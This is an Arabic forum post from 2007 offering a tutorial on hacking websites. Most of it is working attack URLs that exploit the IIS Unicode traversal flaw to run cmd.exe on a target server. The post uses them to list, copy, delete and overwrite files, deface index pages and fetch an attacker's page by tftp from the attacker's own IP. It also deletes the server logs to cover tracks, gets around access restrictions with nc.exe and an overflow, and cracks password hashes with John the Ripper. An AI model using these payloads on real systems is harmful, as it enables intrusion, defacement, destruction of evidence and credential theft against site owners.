منتدى دمعـــة ولـــه - عرض مشاركة واحدة - جميع طرق اختراق المواقع مهم جدا جدا جدا Vip حصريا على دمعة وله

07-12-2007, 07:53 PM

طريقه استغلال ثغرات اي اي اس بكذى طريقه

يتم تطبيق هذه الثغرات مباشرة من المتصفح مستغلين ملف ال
cmd.exe
لتنفيذ اوامرنا
مثال للثغره و تطبيق الاوامر:
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
-----------------------------------------------------------------------------------
امر انشاء دليل جديد
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+cJ
-----------------------------------------------------------------------------------
امر الغاء دليل
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+rd+cJ
-----------------------------------------------------------------------------------
الامر المستخدم للنسخ
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpub******sDJ.e xe
-----------------------------------------------------------------------------------
الامر المستخدم للحذف
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+c:inetpubwwwrootindex.asp
-----------------------------------------------------------------------------------
الامر المستخدم لتغيير مسمى الملف
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ren+cJ.htm+DJKING.htm
-----------------------------------------------------------------------------------
لامر المستخدم لرؤية محتويات الملف
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+type+c:index.htm
-----------------------------------------------------------------------------------
الامر المستخدم للكتابة داخل أي ملف
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+echo+HACKED+BY+DJ+KING+>+cJ.txt
-----------------------------------------------------------------------------------
ملحوظه :
--------
قد نحتاج الى تغيير مسمى الدليل بحيث يكون
msadc , _vti_bin , iisadmpwd , _vit_admin , ******s , samples , cgi-bin

و الان لتغيير الصفحه الاولى لموقع لابد من :
الكتابه على الصفحه الرئيسيه مستخدمين الامر
echo
برفع صفحتك الشخصيه بواسطة برنامج ال
TFTP
طريقة الكتابه على الملف الرئيسي للموقع
index.htm
باستخدام الامر
echo
------------------------
مبدئيا لابد من نسخ ملف
cmd.exe
الي مجلد
******s
بهذا الشكل على سبيل المثال :
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpub******sDJ.e xe
-----------------------------------------------------------------------------------
و بعد ان تم نسخ الملف يمكن تصفح الموقع بالثغره الجديده
http://www.xxx.com/******s/DJ.exe/c+dir+c:
و بعدها يمكن تنفيذ الامر
echo
بالشكل التالي
http://www.xxx.com/******s/DJ.exe?/...hackermail.com+>+c:inetpubwwwrootindex.htm
-----------------------------------------------------------------------------------
ملحوظات هامه:
--------------
ليس بالضروره ان يكون الاندكس الرئسيه للموقع اسمها
index.htm
فممكن ان تكون
index.html , default.html , default.htm , default.asp
فعليك التاكد اولا من اسم الملف و لكن
index.htm
هو الافتراضي ان يكون الرئيسي
- ممكن ان يكون الملف الرئيسي في مجلد غير ال
wwwroot
لذا فلابد من البحث ...
-----------------------------------------------------------------------------------
طريقة استخدام رفع الصفحه بواسطة برنامج
TFTP

سيتم تبطيقها ايضا بالثغره التي اقترضتها اعلى
حمل برنامج ال
tftp
فهو صغير و مجاني
ضعه في ال
c:
ضع الاندكس او صفحتك المراد رفعها في ايضا ال
c:
شغل البرنامج و اجعله جاهزا ثم نفذ الامر التالي:
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+tftp.exe+"-i"+y.y.y.y+GET+index.htm+C:inetpubwwwrootindex. htm
-----------------------------------------------------------------------------------
حيث
-------
tftp.exe هو البرنامج المستخدم للرفع
"i-" براميتر
y.y.y.y رقم الايبي الخاص بك
و الباقي على ما اظن لا يحتاج توضيح ..
C:inetpubwwwrootindex.htm
هو الوضع الافتراضي كما ذكرت لكن ممكن ان يختلف من موقع لاخر فلابد من التاكد اولا
-----------------------------------------------------------------------------------
و اخيرا لمسح اللوق
http://www.xxxx.com/_vti_bin /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+del+c:/winnt/system32/logfiles/*.log
-----------------------------------------------------------------------------------
هذا تقريبا كل ما يخص سيرفرات الويندوز و ال
IIS
اما بالنسبه للمواقع التي سيرفراتها على سبيل المثال : Apache on linux
فطريقة التفكيير ستتغير كليا ماعدا الاختراق عن طريق ال
ftp server
فمعظم نسخ ال
ftp
لها ثغرات يمكن استغلالها.
---------------------------------------------------------------------
5 - شرح ثغرة اليونيكود وكيفية استغلالها:

اولا ثغرات اليونيكود:
UNICODE - Internet Information Service IIS4 - IIS5
اليونيكود – نظام خدمة المعلومات للانترنت الاصدار الرابع – الخامس

- تعريف باليونيكود .
اليونيكود عبارة عن مجموعة من الثغرات في مجموعة خدمة المعلومات التي ركبت مع
IIS4.0 / IIS5.0
والذي ياتي عادة مع
NT4 / Win2k .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- كيفية ايجاد هذه الثغرات .
يتم ايجاد هذه الثغرات بطريقتين :-
1- بواسطة البرامج اللازمة والمخصصة لكشف هذه الثغرات سواء بالبرامج التي تعمل على نظام ويندوز او بطريقة الشل والتي تعمل على نظام لينكس .
2- بواسطة تطبيق الثغرة على الموقع مباشرة .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- كيف يتم استغلال ثغرات اليونكود .
عند تطبيق الثغرة على نظام الـ
IIS4 / IIS5
يبدا ملف
CMD
بفك شفرة اليونكود في المثال الخطاء ومن هنا يتم استغلالها .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
الاوامر المستخدمة بواسطة ملف
.CMD

الاوامر المستخدمه بواسطة ملف الـ
CMD
وهي امر لانشاء دليل جديد وامر لالغاء دليل وامر النسخ وامر النقل وامر الحذف وامر تغيير اسماء الملفات وامر لرؤية محتويات الملف وامر الكتابة داخل أي ملف وامر لسحب أي ملف ، وهي حسب الامثلة التالية :-
**************************************************
**********
امر انشاء دليل جديد
http://www.xxxx.com/msadc/..%c0%af....xe?/c+md+c:\hEx
**************************************************
**********
امر الغاء دليل
http://www.xxxx.com/msadc/..%c0%af....xe?/c+rd+c:\hEx
للمعلومية:لايمكن الغاء أي دليل الا اذا كان فارغاً تمام من الملفات والمجلدات.
**************************************************
**********
الامر المستخدم للنسخ
http://www.xxxx.com/msadc/..%c0%af....******s\hEx.exe
**************************************************
**********
الامر المستخدم للنقل
http://www.xxxx.com/msadc/..%c0%af....pts\hEx.exe+c:\
**************************************************
**********
الامر المستخدم للحذف
http://www.xxxx.com/msadc/..%c0%af....+del+c:\hEx.mdb
**************************************************
**********
الامر المستخدم لتغيير مسمى الملفات http://www.xxxx.com/msadc/..%c0%af....dex.htm+hEx.htm
**************************************************
**********
الامر المستخدم لرؤية محتويات الملف
http://www.xxxx.com/msadc/..%c0%af....type+c:\hEx.txt
**************************************************
**********
الامر المستخدم للكتابة داخل أي ملف
http://www.xxxx.com/msadc/..%c0%af....cho+sNiper_hEx+>c:\hEx.txt
**************************************************
**********
الامر المستخدم لعملية سحب أي ملف
عليك القيام اولاً بنسخ الملف المراد سحبه الى أي دليل وبعدها يتم كتابة اسم الملف في اخر العنوان كالتالي
http://www.xxxx.com/msadc/hEx.mdb
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-طريقة تطبيق هذه الثغرات .
تطبيق الثغرة على الموقع من خلال المتصفح تتم حسب الامثلة التالية :-
http://www.xxxx.com/******s/..%c1%1....exe?/c+dir+c:\
http://www.xxxx.com/******s/..%c0%9....exe?/c+dir+c:\
http://www.xxxx.com/******s/..%c0%a....exe?/c+dir+c:\
http://www.xxxx.com/******s/..%c0%q....exe?/c+dir+c:\
http://www.xxxx.com/******s/..%c1%8....exe?/c+dir+c:\
http://www.xxxx.com/******s/..%c1%9....exe?/c+dir+c:\
http://www.xxxx.com/******s/..%c1%p.../cmd.exe?/c+dir +c:\

وقد نحتاج الى تغيير مسمى الدليل بحيث يكون :-
Msadc , _vti_bin , iisadmpwd , _vit_admin , ******s , samples , cgi-bin
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO .
في حالة اكتشاف موقع يعاني من مشكلة اليونيكود ولنفترض انه كان على هذه الثغرة :-
http://www.xxxx.com/msadc/..%c0%af.....exe?/c+dir+c:\
فنحتاج الى نسخ ملف
w3svc.exe
الى مجلد
inetpub\******s
والامر يكون بهذه الطريقة:
http://www.xxxx.com/msadc/..%c0%af....ripts\w3svc.exe

بعد نسخ ملف
w3svc.exe
الى مجلد
inetpub\******s
الان نقوم بتصفح الموقع من خلال الثغرة بهذه الطريقة
http://www.xxxx.com/******s/w3svc.exe?/c+dir+c:\

الان نستطيع الكتابة داخل أي ملف وبالتحديد الملف الرئيسي للموقع الذي غالبا مايكون في هذا الدليل
inetpub\wwwroot\index.htm
بحيث يكون الامر بالشكل التالي :-
http://www.xxxx.com/******s/ -تم حذف االبريد بواسطة الادارة _برجاء الالتزام بقوانين المنتديات مع الشكر _الادارة -+>+c:\inetpub\wwwroot\inde x.htm
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
طيقة نسخ ملف ال
CMD
نسخه الى مجلد السيكربت بهذه الطريقة :-
http://www.xxxx.com/msadc/..%c0%af....cripts\cmd1.exe
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
الان بامكاننا استخدام ملف الـ
CMD
الجديد في الثغرة بدلا من الاول بهذا الشكل
http://www.xxxx.com/msadc/..%c0%af....1.exe?c+dir+c:\
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
كيفية معرفة مشكلة الـ
Access Denied
والحلول المتبعة لها .
تتم معرفة مشكلة الـ
Access Denied
من خلال المحاولة في حذف أي ملف من أي امتداد ، فعند ظهور رسالة الـ
Access Denied
فاليك هذه الطرق حتى تتمكن من الكتابة على الملفات والتحكم اكثر على السيرفر :-

1-لطريقة الاولى نسخ ملف الـ
CMD
الى دليل السيكربت بمسمى
CMD1
فسوف يتاح لك امكانية الكتابة باستخدام الامر
Copy
باستخدام هذا الامر
http://www.xxxx.com/msadc/..%c0%af....cripts\cmd1.exe

- الطريقة الثانية بالتعامل مع الملف2
ssinc.dll
والطريقة كما يلي
اولا انشاء صفحة باسم
test.shtml
تكون هذه الصفحة داخل مجلد
wwwroot/hEx/test.shtml
كتابة هذا الكود داخل الصفحة بحيث ان حرف
A
يتم كتابتة حتى يتعدى 2049 حرف
الان يتم طلب الصفحة من خلال المتصفح
http://www.xxxx.com/test.shtml
الان سوف تظهر لك الصفحة
الان تستطيع الكتابه وتم تخطي مشكلة الـ
Access Denied
اذا ظهرت لك صفحة الخطاء رقم 500 فمعناها انك لم تقم بتطبيق الطريقة بالشكل الصحيح وعليك اعادة المحاولة .
3-الطريقة الثالثة باستخدام برنامج
NC.exe
بحيث يتم عمل اب لوود لهذا الملف داخل مجلد الـ
Temp
في دليل الويندوز ومنه يتم تنفيذ الاوامر من خلال موجة الدوز وللمعلومية مجلد الـ
Temp
مفتوح لعمليات الاب لوود .
4-الطريقة الرابعة وهي من خلال عمل كراش للسيرفر باستخدام البرامج اللازمة لهذا الغرض وهذه الطريقة غير مجديه في كثير من الاحيان .
5-البحث عن ملفات
root.exe ، sensepost.exe ، ****l.exe ، w3svc.exe ونسخها الى مجلد c:\inetpub\******s
وتطبيق الثغرة من خلالها .
-------------------------------------------------------------------------

3-(شرح البرامج)
1- شرح برنامج جون ذاريبر

حط البرنامج في السي
ملاحظة احفظ الباسوورد في نفس ملف البرنامج في ملف
.txt
وتسميه
password
عشان تمشي مع الشرح
-=-=-=-=-=-=-=-=-=-=-=-
س:\البرنامج كيف يشتغل؟
البرنامج يشتغل على الدوس ادخل على الدوس واكتب
cd..
الين يصير شكله كذا
<:c
اكتب john
الحين ناقصك اوامر
ماهي اوامر البرنامج؟
-=-=-=-=-=-=-=-=-=-=-=-
1-امر يبحث لك عن الكلمات المحتملة من خلال قوائم بكلمات السر وصيغته كالتالي:
john -w:wordlist.txt password.txt
ملف
wordlist
هي كلمات السر المحتمله و
password
كلمة السر المشفرة
(لا انصح بهذا الاختيار)
-=-=-=-=-=-=-=-=-=-=-=-
2-امر يبحث لك عن كلمات السر التي تكون مطابقة لاسم المستخدم وصيغته:
john -single passwd.txt
-=-=-=-=-=-=-=-=-=-=-=-
3-امر يبحث لك عن الارقام فقط وصيغتة:
john -iD:igits passwd.txt
-=-=-=-=-=-=-=-=-=-=-=-
4-امر يبحث عن الحروف الصغيرة:
john -i:Alpha passwd.txt
-=-=-=-=-=-=-=-=-=-=-=-
5-امر يبحث لك عن جميع الاحتمالات الممكنة وصيغتة:
john -i:all passwd.txt
هذا الخيار اذا فشلت فيها كلها لانه طويل بس انه افضل اختيار
-=-=-=-=-=-=-=-=-=-=-=-
طيب انا اخترت اخر واحد وقعد البرنامج ساعة مافك ولا شئ وانا ماني فاضي له بخلي الكمبيوتر شغال وش اسوي؟
عندي الحل اضغط كنترول + شفت +سي او
كنترول+سي
ctrl+shift+c
ctrl+c
-=-=-=-=-=-=-=-=-=-=-=-
كيف اكمل ؟
اكتب
john -restore
وهو يكمل
-------------------------------------------------------------------------

4-( نخترق موقع مع بعض)
اول شي خلينا بالمواقع العادية مو نخترق الياهو مرة وحدة علما بأن اختراق المواقع العاديه سهل.
الحين بعد ما قرأنا الدرس الكبير هذا وفهمناه نبي نطبق اللي فهمناه سوف نخترق موقع مع بعض.
--------------------------
البرامج اللازمة:
Jonh the rippar
WS_FTP pro